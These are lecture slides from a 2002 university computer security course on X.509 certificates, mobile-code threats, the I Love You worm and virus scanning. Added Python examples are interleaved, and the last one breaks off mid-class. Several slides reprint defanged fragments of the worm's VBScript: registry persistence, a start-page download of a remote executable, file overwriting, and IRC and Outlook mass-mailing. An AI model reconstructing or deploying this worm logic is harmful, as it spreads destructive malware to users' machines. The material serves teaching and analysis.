Lecture 5, 20-771: Computer Security, Fall 2002 1 20-771: Computer Security Lecture 4: ATTACK WEEK Robert Thibadeau School of Computer Science Carnegie Mellon University Institute for eCommerce, Fall 2002
Dec 26, 2015
Lecture 5, 20-771: Computer Security, Fall 2002 1

20-771: Computer Security

Lecture 4: ATTACK WEEK

Robert Thibadeau

School of Computer Science

Carnegie Mellon University

Institute for eCommerce, Fall 2002

Lecture 5, 20-771: Computer Security, Fall 2002 2

Today’s lecture

• X.509v3 (usually Public Key) Certificates
• Break (10 min)
• Mobile Code
• Love Bug
• Code Red
• Cookies

Lecture 5, 20-771: Computer Security, Fall 2002 3

This Week

Chapters 4,5 WS

… on Linux

Lecture 5, 20-771: Computer Security, Fall 2002 4

Protocol Stack

Physical Layer

Network Interface – EtherNet/etc.

Internet - IP

Transport - TCP

SSL Interface : Port N

HTTP

FTP

TELNET

NNTP

SMTP

Lecture 5, 20-771: Computer Security, Fall 2002 5

What Could Replace SSL?

Physical Layer

Network Interface – EtherNet/etc.

Internet - IP

Transport - TCP

SSL Interface : Port N

HTTP

FTP

TELNET

NNTP

SMTP

IPSec

Lecture 5, 20-771: Computer Security, Fall 2002 6

X.509v3 Certificates

• More generally used than SSL
  – Used by SSL
  – Used by nearly every major computer security system
• From older standards groups: ISO/ITU
  – International Standards Organization/ANSI
  – International Telecommunications Union (was CCITT – fax, TIFF)
  – Part of the United Nations as of 1988
• ASN.1 (Abstract Syntax Notation 1) – see www.asn1.com
  – This is instead of BNF and is pretty arcane, but includes encoding rules (DER)
  – SGML (predecessor of HTML) used this, as did X.10 financial systems.
• ASN.1 Object Identifier – LDAP, ASN.1 OIDs, Microsoft GUIDs
  – Tree starting with world, down through countries, companies, etc. (www.hyperstamps.com, fun)
  – Your international phone number is a legal Object Identifier
  – It is a felony in nearly every country of the world to counterfeit an ISO-issued Object Identifier

Lecture 5, 20-771: Computer Security, Fall 2002 7

X.509v3 Where to Get

• You have to pay 61 Swiss Francs!
  – www.itu.org -- search on X.509
  – X.509v4 is out
• Those typical Swiss… always getting rich
  – No, this is how nearly all older standards bodies have worked – they sell copies of their standards
  – Buy them. They are like the RFCs and the W3 Specifications. They will make you one of the few real experts.

Lecture 5, 20-771: Computer Security, Fall 2002 8

What is X.509?

• A means of authenticating a “directory”

• Uses public/private key exclusively (and that means RSA for all practical purposes … Sept 21, remember?)

• A means for chaining certificate authorities– Didn’t work, people really just chain certificates

• The information about who you are is hashed and signed so this can be compared with the plaintext about who you are in the certificate

• Serial Number and v3 also an optional Object Identifier – It’s a FELONY to counterfeit this even in IRAQ!!!

Lecture 5, 20-771: Computer Security, Fall 2002 9

X.509 Basic Form

“Who you are” Plaintext

(Signed) Message Digest for Checking on Message Integrity

(Signed) Public Key for Authentication/Exchange RSA

MD5 SHA

Certificate Serial Number

DateTime and Expiration (Sept 21, 2000!)

Lecture 5, 20-771: Computer Security, Fall 2002 10

Concepts behind X.509

• user certificate; public key certificate; certificate:
  – The public keys of a user, together with some other information, rendered unforgeable by encipherment with the private key of the certification authority which issued it.

• certification path:
  – An ordered sequence of certificates of objects in the directory information tree which, together with the public key of the initial object in the path, can be processed to obtain that of the final object in the path.

Lecture 5, 20-771: Computer Security, Fall 2002 11

X.509 Nomenclature

Xp  Public key of a user X

Xs  Private key of a user X

Xp[I]  Encryption of information I using the public key of X

Xs[I]  Encryption of I using the private key of X

X{I}  Signing of I by X: I with a hashed summary appended

CA(X)  A certification authority of user X

CAn(X)  (where n>1): CA(CA(… n times …(X)))

X1<<X2>>  Certificate of user X2 issued by authority X1

X1<<X2>>X2<<X3>>  Chain of certificates, functionally equivalent to X1<<Xn+1>>

X1p*X1<<X2>>  Unwrapping a certificate to extract the public key.

Ap * A<<B>> B<<C>>  denotes using public key A to obtain B’s public key, Bp, from its certificate, followed by using Bp to unwrap C’s certificate. The outcome is the public key of C, Cp.

A -> B  Certification path from A to B, in the form of a chain of certificates starting with CA(A)<<CA2(A)>> and ending with CA(B)<<B>>

Note: the X’s are names of users; I is arbitrary information

Lecture 5, 20-771: Computer Security, Fall 2002 12

Certificate Definition

Certificate ::= SIGNED { SEQUENCE {
    version                 Version DEFAULT v1,
    serialNumber            CertificateSerialNumber,
    signature               AlgorithmIdentifier,
    issuer                  Name,
    validity                Validity,
    subject                 Name,
    subjectPublicKeyInfo    SubjectPublicKeyInfo,
    issuerUniqueIdentifier  ObjectIdentifier,   -- v3
    subjectUniqueIdentifier ObjectIdentifier,   -- v3
    extensions              Extensions }}

Lecture 5, 20-771: Computer Security, Fall 2002 13

Certificate Defined (cont)

Version ::= INTEGER   (for v1, v2, v3)
CertificateSerialNumber ::= INTEGER
AlgorithmIdentifier ::= SEQUENCE { ..stuff about crypto }
Validity ::= SEQUENCE {
    notBefore Time,
    notAfter  Time }
SubjectPublicKeyInfo ::= SEQUENCE {
    algorithm        AlgorithmIdentifier,
    subjectPublicKey BIT STRING }
Time ::= CHOICE {
    utcTime         UTCTime,
    generalizedTime GeneralizedTime }
Extensions ::= SEQUENCE OF Extension
    like Signed Hash, KeyUsage …
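The ASN.1 above is what DER actually serialises, so here is a DER round trip for that skeleton: version, serialNumber, signature, issuer, validity and subject are encoded with hand-written X.690 rules and then walked back out field by field, the way openssl prints them on the later "Opened" slide. This is an added example, not code from the lecture; it leaves out subjectPublicKeyInfo and the outer SIGNED{} wrapper (so it is an unsigned tbsCertificate, not a usable certificate), encodes version as the [0] EXPLICIT tag the standard uses, and the names and dates are constructed to mirror the Snake Oil demo certificate.

```python
"""DER encode/decode of the Certificate skeleton from the slides.
Added example, standard library only; names and dates are constructed."""
from datetime import datetime

# ---- DER encoding (X.690): tag, length, value --------------------------------
def der_len(n):
    if n < 0x80:                       # short form
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body   # long form: 0x8N + N length bytes

def tlv(tag, body):
    return bytes([tag]) + der_len(len(body)) + body

def der_int(v):                        # INTEGER: minimal two's complement, big-endian
    return tlv(0x02, v.to_bytes((v.bit_length() + 8) // 8, "big", signed=True))

def der_oid(dotted):                   # OBJECT IDENTIFIER: 40*a+b, then base-128 arcs
    arcs = [int(a) for a in dotted.split(".")]
    out = [40 * arcs[0] + arcs[1]]
    for a in arcs[2:]:
        chunk = [a & 0x7F]
        a >>= 7
        while a:
            chunk.insert(0, 0x80 | (a & 0x7F))
            a >>= 7
        out += chunk
    return tlv(0x06, bytes(out))

def der_name(rdns):                    # Name ::= SEQUENCE OF SET OF {type OID, PrintableString}
    return tlv(0x30, b"".join(
        tlv(0x31, tlv(0x30, der_oid(oid) + tlv(0x13, val.encode("ascii"))))
        for oid, val in rdns))

def der_utctime(dt):                   # UTCTime YYMMDDhhmmssZ
    return tlv(0x17, dt.strftime("%y%m%d%H%M%SZ").encode("ascii"))

MD5_RSA = "1.2.840.113549.1.1.4"      # md5WithRSAEncryption, as in the Snake Oil cert

def build_tbs(serial, issuer, subject, not_before, not_after):
    return tlv(0x30,
        tlv(0xA0, der_int(2))                               # [0] EXPLICIT Version: v3 is 2
        + der_int(serial)                                   # serialNumber
        + tlv(0x30, der_oid(MD5_RSA) + tlv(0x05, b""))      # signature AlgorithmIdentifier
        + der_name(issuer)                                  # issuer Name
        + tlv(0x30, der_utctime(not_before) + der_utctime(not_after))  # Validity
        + der_name(subject))                                # subject Name

# ---- DER decoding ------------------------------------------------------------
def read_tlv(buf, pos=0):
    """Return (tag, value bytes, position just after this TLV)."""
    tag, first = buf[pos], buf[pos + 1]
    if first < 0x80:
        length, start = first, pos + 2
    else:
        n = first & 0x7F
        length, start = int.from_bytes(buf[pos + 2:pos + 2 + n], "big"), pos + 2 + n
    return tag, buf[start:start + length], start + length

def decode_oid(body):
    arcs, acc = [body[0] // 40, body[0] % 40], 0
    for b in body[1:]:
        acc = (acc << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(acc)
            acc = 0
    return ".".join(map(str, arcs))

ATTR = {"2.5.4.6": "C", "2.5.4.8": "ST", "2.5.4.7": "L",
        "2.5.4.10": "O", "2.5.4.11": "OU", "2.5.4.3": "CN"}

def decode_name(body):                 # rendered like openssl: C=XY, ST=..., CN=...
    parts, pos = [], 0
    while pos < len(body):
        _, rdn, pos = read_tlv(body, pos)
        _, atv, _ = read_tlv(rdn)
        _, oid, p = read_tlv(atv)
        _, val, _ = read_tlv(atv, p)
        parts.append(f"{ATTR.get(decode_oid(oid), decode_oid(oid))}={val.decode('ascii')}")
    return ", ".join(parts)

def open_tbs(der):
    """Walk the SEQUENCE in the order the ASN.1 definition gives."""
    _, body, _ = read_tlv(der)
    tag, ver, pos = read_tlv(body)
    assert tag == 0xA0, "expected [0] version"
    _, v, _ = read_tlv(ver)
    _, ser, pos = read_tlv(body, pos)
    _, alg, pos = read_tlv(body, pos)
    _, oid, _ = read_tlv(alg)
    _, iss, pos = read_tlv(body, pos)
    _, val, pos = read_tlv(body, pos)
    _, nb, p = read_tlv(val)
    _, na, _ = read_tlv(val, p)
    _, sub, pos = read_tlv(body, pos)
    return {"version": int.from_bytes(v, "big", signed=True) + 1,
            "serial": int.from_bytes(ser, "big", signed=True),
            "sigalg": {MD5_RSA: "md5WithRSAEncryption"}.get(decode_oid(oid), decode_oid(oid)),
            "issuer": decode_name(iss), "subject": decode_name(sub),
            "not_before": nb.decode("ascii"), "not_after": na.decode("ascii")}

# Constructed names mirroring the Snake Oil demo certificate (e-mail attribute omitted)
SNAKE_CA = [("2.5.4.6", "XY"), ("2.5.4.8", "Snake Desert"), ("2.5.4.7", "Snake Town"),
            ("2.5.4.10", "Snake Oil, Ltd"), ("2.5.4.11", "Certificate Authority"),
            ("2.5.4.3", "Snake Oil CA")]
SNAKE_WWW = SNAKE_CA[:4] + [("2.5.4.11", "Webserver Team"), ("2.5.4.3", "www.snakeoil.dom")]

def demo():
    der = build_tbs(1, SNAKE_CA, SNAKE_WWW,
                    datetime(1999, 10, 21, 18, 21, 51), datetime(2001, 10, 20, 18, 21, 51))
    return open_tbs(der)     # issuer Name alone is 137 bytes, so long-form lengths are exercised
```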

Lecture 5, 20-771: Computer Security, Fall 2002 14

X.509v3 Certificate

(PEM-encoded certificate: -----BEGIN CERTIFICATE----- … -----END CERTIFICATE-----)

Lecture 5, 20-771: Computer Security, Fall 2002 15

X.509v3 Opened!

Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number: 1 (0x1)
        Signature Algorithm: md5WithRSAEncryption
        Issuer: C=XY, ST=Snake Desert, L=Snake Town, O=Snake Oil, Ltd, OU=Certificate Authority, CN=Snake Oil CA/[email protected]
        Validity
            Not Before: Oct 21 18:21:51 1999 GMT
            Not After : Oct 20 18:21:51 2001 GMT
        Subject: C=XY, ST=Snake Desert, L=Snake Town, O=Snake Oil, Ltd, OU=Webserver Team, CN=www.snakeoil.dom/[email protected]
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
            RSA Public Key: (1024 bit)
                Modulus (1024 bit):

Lecture 5, 20-771: Computer Security, Fall 2002 16

509 Opened 2

                    00:b9:e7:84:68:f9:51:f4:74:93:8d:aa:58:cf:05:
                    6f:82:ef:63:03:34:63:72:f5:e5:e7:cd:e8:d7:ad:
                    cc:ec:1e:cd:cf:73:dd:95:69:ab:7a:0a:92:04:10:
                    6b:9e:c8:6d:bd:c5:a8:1b:d6:8e:c6:8f:62:91:82:
                    95:58:72:67:71:ea:d1:dd:d8:99:05:5b:90:5c:15:
                    57:d6:5c:be:36:3d:5e:2b:7f:dc:e2:62:89:fc:8d:
                    6b:1b:2b:66:84:f8:be:a1:0a:d7:1b:c5:d6:c7:38:
                    66:5d:48:85:99:27:07:3f:d5:5b:3b:d1:2f:fb:22:
                    65:be:65:db:3c:60:41:62:03
                Exponent: 65537 (0x10001)
        X509v3 extensions:
            X509v3 Subject Alternative Name:
                email:[email protected]
            Netscape Comment:
                mod_ssl generated custom server certificate
            Netscape Cert Type:
                SSL Server
    Signature Algorithm: md5WithRSAEncryption
        7a:31:1b:18:19:35:d4:47:9d:ff:9d:39:11:0d:09:41:76:00:
        9c:9e:1c:b7:84:4a:df:98:f3:65:fc:ea:f9:8d:63:a6:ba:e7:
        de:21:7a:82:bc:ce:9d:2b:b9:16:fc:a0:5b:a2:e8:b8:a5:f7:
        c8:29:45:5a:7c:b5:0c:74:04:55:57:a0:69:20:63:08:e4:b9:
        95:14:ad:ec:83:0b:89:d3:5b:ff:f7:48:42:b7:89:13:5a:84:
        fc:60:76:c1:2e:d4:21:ec:fc:d6:80:9a:01:01:8e:cc:26:68:
        d2:82:e6:02:46:df:75:b1:4e:0a:b3:47:5f:5a:c7:48:b6:4c:
        38:b9

Lecture 5, 20-771: Computer Security, Fall 2002 17

Date Time

• Great Security Technique for Authentication
  – Challenge-Response: let mother nature be the challenge.
  – Very hard to defeat since you have to crack the code too quickly … can be used to put a time limit on things. This is used by many certificates.
• Kerberos uses this in issuing “tickets” for a time.
• Great Security Technique for Auditability
  – Hash the date-time and sign it.
  – Requires an authority or both members of the transaction to maintain a copy (you can’t deny your signature even if you “fix” your copy!)

Lecture 5, 20-771: Computer Security, Fall 2002 18

X.509 certificate types

• For people

• For web sites

• For companies

• For organizations inside companies

• For software

• Etc. etc. etc.

• You could have X.509 certificates that certify a toaster made a piece of toast.

http://yuan.ecom.cmu.edu/security02/509.doc

Lecture 5, 20-771: Computer Security, Fall 2002 19

Bits in the KeyUsage type are as follows:

– a) digitalSignature: For verifying digital signatures that have purposes other than those identified in b), f), or g) below.
– b) nonRepudiation: For verifying digital signatures used in providing a non-repudiation service which protects against the signing entity falsely denying some action (excluding certificate or CRL signing, as in f) or g) below).
– c) keyEncipherment: For enciphering keys or other security information, e.g. for key transport. (EXCHANGE)
– d) dataEncipherment: For enciphering user data, but not keys or other security information as in c) above.
– e) keyAgreement: For use as a public key agreement key.
– f) keyCertSign: For verifying a CA’s signature on certificates.
– g) cRLSign: For verifying a CA’s signature on CRLs.
– h) encipherOnly: Public key agreement key for use only in enciphering data when used with keyAgreement bit also set (meaning with other key usage bit set is undefined).
– i) decipherOnly: Public key agreement key for use only in deciphering data when used with keyAgreement
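In a certificate the KeyUsage value is a DER BIT STRING whose first content byte says how many trailing bits of the last byte are padding, and bit 0 is the most significant bit of the first byte; getting that wrong silently swaps, say, digitalSignature for decipherOnly. This added decoder (not from the lecture, standard library only) maps the bits to the a)..i) names above and applies the slide's rule that h) and i) are undefined without keyAgreement; the sample encodings are constructed by hand, not taken from a real certificate.

```python
"""Decode X.509 KeyUsage (DER BIT STRING with named bits) into the names a)..i).
Added example; sample byte strings are constructed."""

KEY_USAGE_BITS = [            # bit position -> name, in X.509 order
    "digitalSignature",       # 0  a)
    "nonRepudiation",         # 1  b)
    "keyEncipherment",        # 2  c)
    "dataEncipherment",       # 3  d)
    "keyAgreement",           # 4  e)
    "keyCertSign",            # 5  f)
    "cRLSign",                # 6  g)
    "encipherOnly",           # 7  h)
    "decipherOnly",           # 8  i)
]

def decode_key_usage(der):
    """der: the extension's BIT STRING TLV (tag 0x03, short-form length).
    Returns the set of usage names whose bit is 1; raises ValueError if malformed."""
    if len(der) < 3 or der[0] != 0x03:
        raise ValueError("not a BIT STRING")
    length = der[1]
    if length >= 0x80 or 2 + length != len(der):
        raise ValueError("bad length")
    unused = der[2]                      # trailing pad bits in the last content byte
    bits = der[3:]
    if unused > 7 or (not bits and unused):
        raise ValueError("bad unused-bits count")
    nbits = len(bits) * 8 - unused
    names = set()
    for i in range(nbits):
        if bits[i // 8] & (0x80 >> (i % 8)):   # bit 0 is the MSB of byte 0
            if i >= len(KEY_USAGE_BITS):
                raise ValueError(f"unknown KeyUsage bit {i} set")
            names.add(KEY_USAGE_BITS[i])
    return names

def check_consistency(names):
    """The slide's rule for h) and i): encipherOnly / decipherOnly are undefined
    unless keyAgreement is also set. Returns a list of problems (empty means ok)."""
    return [f"{only} without keyAgreement is undefined"
            for only in ("encipherOnly", "decipherOnly")
            if only in names and "keyAgreement" not in names]

# Constructed samples: tag 03, length, unused-bits byte, then the bits
TLS_SERVER = bytes.fromhex("030205a0")       # a0 = 1010 0000, 5 pad bits: bits 0 and 2
CA_CERT = bytes.fromhex("03020106")          # 06 = 0000 0110, 1 pad bit:  bits 5 and 6
DH_DECIPHER = bytes.fromhex("0303070880")    # 9 bits: bit 4 (keyAgreement) and bit 8 (decipherOnly)
BAD_ENCIPHER_ONLY = bytes.fromhex("03020001")  # bit 7 alone: encipherOnly without keyAgreement
```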

Lecture 5, 20-771: Computer Security, Fall 2002 20

What’s Wrong with Them

• Classic HORRIBLE USER INTERFACE ASSOCIATED WITH GOOD CRYPTOGRAPHY

• You have to apply to a root CA for one

• They invade your privacy

• They make you PAY

• They make them last only one Year

• Funwork: Go to Thawte (www.verisign.com) and get a free personal certificate for your mail browser (outlook, eudora, or netscape)

Lecture 5, 20-771: Computer Security, Fall 2002 21

X.509v3

• Contains encrypted information that the source can communicate to you in privacy and with authority.

– Authenticated, private, tamperproof, authorization

• Designed to be employed as the basis for PKI : chaining authority

– Pass something up the chain for approval (signing) to provide the absolute authority

– I.e., the President’s office confirms such and such directive.

Lecture 5, 20-771: Computer Security, Fall 2002 22

Break!

Lecture 5, 20-771: Computer Security, Fall 2002 23

Active Content (also called “Mobile Code”)

• Web Browsers can download and execute software automatically without warning.

• Software may damage user’s system or violate privacy.

• Administrator: This can tunnel through firewall protections.

• Case: U.S. Government came close, within two weeks, to an executive order that shut down all “mobile code” in the government.

• Failed: This would “dumb down” Federal employees and make the Government Stupid.

Lecture 5, 20-771: Computer Security, Fall 2002 24

Threats from Mobile Code

• Purposefully malicious
  – Moldovan Connection
    » Sexygirls.com and Erotic2000.com
    » Downloaded and ran viewer; the program hung up the phone and made a long distance call to Moldova, $2 per minute.
    » User taken to the site stayed around without knowing the charge.
    » Last few weeks: “Some subscribers to Microsoft's MSN TV service have been struck with a virus that causes their set-top box to dial 911. Ryan Permeh, senior research engineer at eEye Digital Security, said the virus probably was not intended to target MSN TV users.”
  – “I Love You” Worm: probable accidental escape.
• Big programs have bugs
  – Other people will exploit those bugs

Lecture 5, 20-771: Computer Security, Fall 2002 25

Traditional Threats

• Trojan Horses : Very Serious. Often used for spying. (e.g., change the login program to create a back door).

• Virus : Code that replicates itself and inserts into an executable program or file.

• Macro viruses : Viruses written in the macro language of a word processor, or other trusted program. Becomes infectious on other documents.

• Rabbits : Programs that make many copies of themselves. Standalone. Denial of Service.

• Worms : Similar but spread across network.

Lecture 5, 20-771: Computer Security, Fall 2002 26

Many Many Threats

• I Love You
  – Opening email that says “I Love You” from a person you know: Trojan Horse
  – Reads your address book: Privacy Violation
  – Deletes image files: Havoc
  – Across Network: Worm
• Demonstrated
  – Microsoft Outlook could execute seriously destructive and intrusive active content without control of the user.

Lecture 5, 20-771: Computer Security, Fall 2002 27

Silent Information Thieves!

Access Log - My NeXT Machine in my office (BSD 4.2) (/private/adm/network)
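The access log above is tcpd-style syslog: "connect from", "refused connect from", "host name/address mismatch" and "gethostbyname … lookup failure" lines from ftpd and telnetd. As an added example (not from the lecture, standard library only), this parser groups the lines by source and flags refused connects, reverse-DNS mismatches, and sources that hit more than one service within a few seconds, which is what a probe looks like in such a log. The sample lines are constructed in the slide's format with RFC 5737 addresses and example.* names rather than the real hosts; syslog carries no year, so 2000 is assumed when parsing timestamps.

```python
"""Triage of tcpd-style syslog lines (ftpd/telnetd) like those on the slide.
Added example; SAMPLE_LOG is constructed, not the real log."""
import re
from collections import defaultdict
from datetime import datetime

LINE = re.compile(r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ "
                  r"(?P<svc>\w+)\[\d+\]: (?P<msg>.*)$")
CONNECT = re.compile(r"^(?P<refused>refused )?connect from (?P<src>\S+)$")
MISMATCH = re.compile(r"^host name/address mismatch: (?P<ip>\S+) != (?P<name>\S+)$")

SAMPLE_LOG = """\
May  9 03:23:05 nageela ftpd[2184]: refused connect from 192.0.2.173
May  9 05:21:48 nageela ftpd[2203]: gethostbyname(adsl-192-0-2-173.example.net): lookup failure
May  9 05:21:48 nageela ftpd[2203]: refused connect from 192.0.2.173
May 13 07:11:42 nageela ftpd[4267]: connect from mirror.example.edu
May 16 19:46:24 nageela telnetd[5775]: connect from 198.51.100.4
May 16 19:46:24 nageela ftpd[5776]: connect from 198.51.100.4
May 16 19:46:24 nageela ftpd[5774]: connect from 198.51.100.4
May 16 19:46:24 nageela telnetd[5777]: connect from 198.51.100.4
Sep 13 11:07:01 nageela telnetd[23665]: host name/address mismatch: 203.0.113.141 != lasagna.example.com
Sep 13 11:07:01 nageela telnetd[23665]: refused connect from 203.0.113.141
"""

def parse(text):
    """One dict per syslog line: ts, svc, src (None if no source), kind."""
    events = []
    for line in text.splitlines():
        m = LINE.match(line)
        if not m:
            continue                                   # not a daemon line; skip
        ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S").replace(year=2000)  # assumed year
        msg = m["msg"]
        c, mm = CONNECT.match(msg), MISMATCH.match(msg)
        if c:
            events.append({"ts": ts, "svc": m["svc"], "src": c["src"],
                           "kind": "refused" if c["refused"] else "connect"})
        elif mm:                                       # tcpd PARANOID check failed
            events.append({"ts": ts, "svc": m["svc"], "src": mm["ip"],
                           "kind": "mismatch", "claimed": mm["name"]})
        else:                                          # e.g. gethostbyname lookup failure
            events.append({"ts": ts, "svc": m["svc"], "src": None, "kind": "other", "msg": msg})
    return events

def triage(events, window_seconds=5):
    """Per source: attempt count, refused/mismatch counts, services touched,
    and probe=True when more than one service is hit within window_seconds."""
    by_src = defaultdict(list)
    for e in events:
        if e["src"]:
            by_src[e["src"]].append(e)
    report = {}
    for src, evs in by_src.items():
        evs.sort(key=lambda e: e["ts"])
        probe = False
        for i, e in enumerate(evs):
            burst = [x for x in evs[i:] if (x["ts"] - e["ts"]).total_seconds() <= window_seconds]
            if len({x["svc"] for x in burst}) > 1:
                probe = True
                break
        report[src] = {"attempts": len(evs),
                       "refused": sum(e["kind"] == "refused" for e in evs),
                       "mismatch": sum(e["kind"] == "mismatch" for e in evs),
                       "services": sorted({e["svc"] for e in evs}),
                       "probe": probe}
    return report
```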

Lecture 5, 20-771: Computer Security, Fall 2002 28

Lecture 5, 20-771: Computer Security, Fall 2002 29

Economic Costs (Computer Economics, 8-01)

• Love Bug : $8.7 Billion

• Melissa $1.2 Billion

• Code Red $2.6 Billion
  – 250,000 systems in just nine hours on July 19
  – 150,000 in 24 hours on Aug 1, after warnings

• Repair costs and loss of productivity and unknown cost of asset loss

Lecture 5, 20-771: Computer Security, Fall 2002 30

I Love You Code (virus has been killed)

had name ‘vxryfunny.vbs’

rxm barok -lovxlxttxr(vbx) <i hatx go to school>

rxm by: spydxr / [email protected] / @GRAMMxRSoft Group / Manila,Philippinxs

dim fso,dirsystxm,dirwin,dirtxmp,filx,vbscopy,dow

Sxt fso = CrxatxObj("Scripting.FilxSystxmObj")

sxt filx = fso.OpxnTxxt(WScript.ScriptFullnamx,1)

vbscopy=filx.RxadAll

Lecture 5, 20-771: Computer Security, Fall 2002 31

I Love You Code 2

main()
sxt wscr=CrxatxObj("WScript.Shxll")
rr=wscr.RxgRxad("HKxY_CURRxNT_USxR\Softwarx\Microsoft\Windows Scripting Host\Sxttings\Timxout")
wscr.RxgWritx "HKxY_CURRxNT_USxR\Softwarx\Microsoft\Windows Scripting Host\Sxttings\Timxout",0,"RxG_DWORD"
Sxt dirwin = fso.GxtSpxcialFoldxr(0)
Sxt dirsystxm = fso.GxtSpxcialFoldxr(1)
Sxt dirtxmp = fso.GxtSpxcialFoldxr(2)
Sxt c = fso.GxtFilx(WScript.ScriptFullNamx)
c.Copy(dirsystxm&"\MSKxrnxl32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystxm&"\Vxry Funny.vbs")
rxgruns()
html()
sprxadtoxmail()
listadriv()

Lecture 5, 20-771: Computer Security, Fall 2002 32

I Love You Code 3 : rxgruns()

sub rxgruns()
rxgcrxatx "HKxY_LOCAL_MACHINx\Softwarx\Microsoft\Windows\CurrxntVxrsion\Run\MSKxrnxl32",dirsystxm&"\MSKxrnxl32.vbs"
rxgcrxatx "HKxY_LOCAL_MACHINx\Softwarx\Microsoft\Windows\CurrxntVxrsion\RunSxrvicxs\Win32DLL",dirwin&"\Win32DLL.vbs"
Dn=rxggxt("HKxY_CURRxNT_USxR\Softwarx\Microsoft\Intxrnxt xxplorxr\Download Dirory")
rxgcrxatx "HKCU\Softwarx\Microsoft\Intxrnxt xxplorxr\Main\Start Pagx","http://www.skyinxt.nxt/~young1s/HJKhjnwxrhjkxcvytwxrtnMTFwxtrdsfmhPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.xxx"

rxgcrxatx "HKxY_LOCAL_MACHINx\Softwarx\Microsoft\Windows\CurrxntVxrsion\Run\WIN-BUGSFIX",downrxad&"\WIN-BUGSFIX.xxx"

rxgcrxatx "HKxY_CURRxNT_USxR\Softwarx\Microsoft\Intxrnxt xxplorxr\Main\Start Pagx","about:blank"

xnd sub

Lecture 5, 20-771: Computer Security, Fall 2002 33

I Love You Code 4: Listing the Drives on Your Machine

(there were several of these utility-type spies)

sub listadriv

Dim d,dc,s

Sxt dc = fso.Drivxs

For xach d in dc

If d.DrivxTypx = 2 or d.DrivxTypx=3 Thxn

foldxrlist(d.path&"\")

xnd if

Nxxt

listadriv = s

xnd sub

Lecture 5, 20-771: Computer Security, Fall 2002 34

I Love You Code 5: re-writing jpg files

sub inffilxs(foldxrspxc)
sxt f = fso.GxtFoldxr(foldxrspxc)
sxt fc = f.Filxs
for xach f1 in fc
xxt=fso.GxtxxtxnsionNamx(f1.path)
if (xxt="vbs") or (xxt="vbx") thxn
sxt ap=fso.OpxnTxxtFilx(f1.path,2,trux)
ap.writx vbscopy
ap.closx
xlsxif(xxt="jpg") or (xxt="jpxg") thxn
sxt ap=fso.OpxnTxxtFilx(f1.path,2,trux)
ap.writx vbscopy
ap.closx
(did the same for mp3 files and others)

Lecture 5, 20-771: Computer Security, Fall 2002 35

I Love You Code 6 : .ini file

if (xq<>foldxrspxc) thxn
if (s="mirc32.xxx") or (s="mlink32.xxx") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp") thxn
sxt scriptini=fso.CrxatxTxxtFilx(foldxrspxc&"\script.ini")
scriptini.WritxLinx "[script]"
scriptini.WritxLinx ";mIRC Script"
scriptini.WritxLinx "; Plxasx dont xdit this script... mIRC will corrupt, if mIRC will"
scriptini.WritxLinx " corrupt... WINDOWS will aff and will not run corrly. thanks"
scriptini.WritxLinx ";"
scriptini.WritxLinx ";Khalxd Mardam-Bxy"
scriptini.WritxLinx ";http://www.mirc.com"
scriptini.WritxLinx ";"
scriptini.WritxLinx "n0=on 1:JOIN:#:{"
scriptini.WritxLinx "n1= /if ( $nick == $mx ) { halt }"
scriptini.WritxLinx "n2= /.dcc sxnd $nick "&dirsystxm&"\Vxry Funny.HTM"
scriptini.WritxLinx "n3=}"
scriptini.closx
xq=foldxrspxc
nxxt
xnd sub


Lecture 5, 20-771: Computer Security, Fall 2002 37

I Love You Code 8 : spread mail

sub sprxadtoxmail()
sxt rxgxdit=CrxatxObj("WScript.Shxll")
sxt out=WScript.CrxatxObj("Outlook.Application")
sxt mapi=out.GxtNamxSpacx("MAPI")
for ctrlists=1 to mapi.AddrxssLists.Count
sxt a=mapi.AddrxssLists(ctrlists)
rxgv=rxgxdit.RxgRxad("HKxY_CURRxNT_USxR\Softwarx\Microsoft\WAB\"&a)
if (int(a.Addrxssxntrixs.Count)>int(rxgv)) thxn
for ctrxntrixs=1 to a.Addrxssxntrixs.Count
malxad=a.Addrxssxntrixs(x)
rxgad=""
rxgad=rxgxdit.RxgRxad("HKxY_CURRxNT_USxR\Softwarx\Microsoft\WAB\"&malxad)
if (rxgad="") thxn
sxt malx=out.CrxatxItxm(0)
malx.Rxcipixnts.Add(malxad)
malx.Subj = "fwd: Jokx"
malx.Body = vbcrlf&""
malx.Attachmxnts.Add(dirsystxm&"\Vxry Funny.vbs")
malx.Sxnd
Sxt out=Nothing
Sxt mapi=Nothing
xnd sub

Lecture 5, 20-771: Computer Security, Fall 2002 38

Silent Attacks

• It should be obvious that it would not be hard to create a silent worm that sends out mail about your file systems, files, and address lists (and also all the mail on your local machine).

• We can do this with your web browser too …

… Code Red is only ONE example

Lecture 5, 20-771: Computer Security, Fall 2002 39

Virus Checkers

• Pattern match in secret ways to find viral “fingerprints”

• Use a technique called “finite state automata” to create very fast search over your files.

• If virus is not known already, it will do damage.

• Finding silent viruses may be hard.
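The finite-state-automaton search the slide attributes to virus checkers, as an added example that is not from the lecture: an Aho-Corasick automaton over bytes that finds every known signature in a single pass, in time proportional to the file length plus the number of hits, and that reports overlapping signatures through its output links. The signature strings and the sample file bytes are constructed for illustration (two object names from the scripting language the worm slides use), not real antivirus signatures; it also shows the slide's caveat that an unknown pattern simply produces no hit.

```python
"""Multi-pattern signature scanning with an Aho-Corasick automaton.
Added example; SIGNATURES and SAMPLE_FILE are constructed, not real AV data."""
from collections import deque

class SignatureAutomaton:
    """Build once from all signatures, then scan any number of files."""
    def __init__(self, signatures):
        self.goto = [{}]        # state -> {byte: next state}
        self.fail = [0]         # state -> state to fall back to on a mismatch
        self.out = [[]]         # state -> signature names that end in this state
        self.length = {}        # name -> pattern length, to turn end offsets into starts
        for name, pattern in signatures.items():
            self._add(name, pattern)
        self._link()

    def _add(self, name, pattern):
        self.length[name] = len(pattern)
        state = 0
        for b in pattern:                        # walk/extend the trie byte by byte
            if b not in self.goto[state]:
                self.goto[state][b] = len(self.goto)
                self.goto.append({})
                self.fail.append(0)
                self.out.append([])
            state = self.goto[state][b]
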